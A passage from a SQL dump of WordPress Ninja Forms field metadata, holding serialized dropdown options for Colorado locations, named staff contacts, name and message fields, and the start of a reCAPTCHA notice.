dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8928,258,'field_label','First Name','field_label','First Name'),(8929,258,'field_key','textbox_221','field_key','textbox_221'),(8930,258,'custom_name_attribute','','custom_name_attribute',''),(8931,258,'personally_identifiable','','personally_identifiable',''),(8932,258,'value','','value',''),(8933,259,'field_label','Last Name','field_label','Last Name'),(8934,259,'field_key','lastname_222','field_key','lastname_222'),(7216,250,'key','listselect_194','key','listselect_194'),(7217,250,'container_class','one-half first','container_class','one-half first'),(7218,250,'parent_id','23','parent_id','23'),(17576,632,'order','9','order','9'),(11740,77,'idAttribute','id','idAttribute','id'),(11738,75,'idAttribute','id','idAttribute','id'),(11737,74,'idAttribute','id','idAttribute','id'),(11736,73,'idAttribute','id','idAttribute','id'),(11730,67,'drawerDisabled','','drawerDisabled',''),(11731,68,'idAttribute','id','idAttribute','id'),(11732,69,'idAttribute','id','idAttribute','id'),(11733,70,'idAttribute','id','idAttribute','id'),(11734,71,'idAttribute','id','idAttribute','id'),(11735,72,'idAttribute','id','idAttribute','id'),(11728,66,'idAttribute','id','idAttribute','id'),(11729,67,'idAttribute','id','idAttribute','id'),(7250,253,'objectType','Field','objectType','Field'),(7251,253,'objectDomain','fields','objectDomain','fields'),(7252,253,'editActive','','editActive',''),(7253,253,'order','7','order','7'),(7254,253,'type','listselect','type','listselect'),(7255,253,'label','Select The Person You Would Like To Contact','label','Select The Person You Would Like To Contact'),(7256,253,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7257,253,'label_pos','above','label_pos','above'),(7258,253,'list_type','dropdown','list_type','dropdown'),(7259,253,'multi_size','5','multi_size','5'),(7260,253,'list_show_value','1','list_show_value','1'),(7261,253,'list','a:0:{}','list','a:0:{}'),(7262,253,'user_info_field_group','','user_info_field_group',''),(7263,253,'calc_auto_include','0','calc_auto_include','0'),(7264,253,'user_state','0','user_state','0'),(7265,253,'num_sort','0','num_sort','0'),(7266,253,'admin_label','','admin_label',''),(7267,253,'show_help','0','show_help','0'),(7268,253,'help_text','','help_text',''),(7269,253,'show_desc','0','show_desc','0'),(7270,253,'desc_pos','none','desc_pos','none'),(7271,253,'desc_text','','desc_text',''),(7272,253,'element_class','','element_class',''),(7273,253,'required','1','required','1'),(7274,253,'options','a:4:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:20:\"Initiator-Kathy Neal\";s:5:\"value\";s:20:\"Initiator-Kathy Neal\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:24:\"Initiator-Lynnzie Sutton\";s:5:\"value\";s:24:\"Initiator-Lynnzie Sutton\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:3;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:28:\"Initiator-Laurah Brock Young\";s:5:\"value\";s:28:\"Initiator-Laurah Brock Young\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}','options','a:4:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:20:\"Initiator-Kathy Neal\";s:5:\"value\";s:20:\"Initiator-Kathy Neal\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:24:\"Initiator-Lynnzie Sutton\";s:5:\"value\";s:24:\"Initiator-Lynnzie Sutton\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:3;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:28:\"Initiator-Laurah Brock Young\";s:5:\"value\";s:28:\"Initiator-Laurah Brock Young\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}'),(8925,257,'field_label','Text','field_label','Text'),(8926,257,'field_key','html_220','field_key','html_220'),(8927,257,'drawerDisabled','','drawerDisabled',''),(7275,253,'key','select_the_person_you_would_like_to_contact_1613166940171','key','select_the_person_you_would_like_to_contact_1613166940171'),(7276,253,'container_class','one-half','container_class','one-half'),(7277,253,'parent_id','23','parent_id','23'),(7278,254,'objectType','Field','objectType','Field'),(7279,254,'objectDomain','fields','objectDomain','fields'),(7280,254,'editActive','','editActive',''),(7281,254,'order','8','order','8'),(7282,254,'type','textarea','type','textarea'),(7283,254,'label','Enter Your Message Here','label','Enter Your Message Here'),(7284,254,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7285,254,'label_pos','above','label_pos','above'),(7286,254,'default_value','','default_value',''),(7287,254,'textarea_rte','0','textarea_rte','0'),(7288,254,'textarea_media','0','textarea_media','0'),(7289,254,'disable_rte_mobile','0','disable_rte_mobile','0'),(7290,254,'input_limit','','input_limit',''),(7291,254,'input_limit_type','char','input_limit_type','char'),(7292,254,'calc_auto_include','0','calc_auto_include','0'),(7293,254,'num_sort','0','num_sort','0'),(7294,254,'admin_label','','admin_label',''),(7295,254,'show_help','0','show_help','0'),(7296,254,'help_text','','help_text',''),(7297,254,'show_desc','0','show_desc','0'),(7298,254,'desc_pos','none','desc_pos','none'),(7299,254,'desc_text','','desc_text',''),(7300,254,'element_class','','element_class',''),(7301,254,'required','1','required','1'),(7302,254,'default','','default',''),(7303,254,'key','textarea_198','key','textarea_198'),(7304,254,'placeholder','','placeholder',''),(7305,254,'container_class','','container_class',''),(7306,254,'manual_key','','manual_key',''),(7307,254,'parent_id','23','parent_id','23'),(17403,614,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of 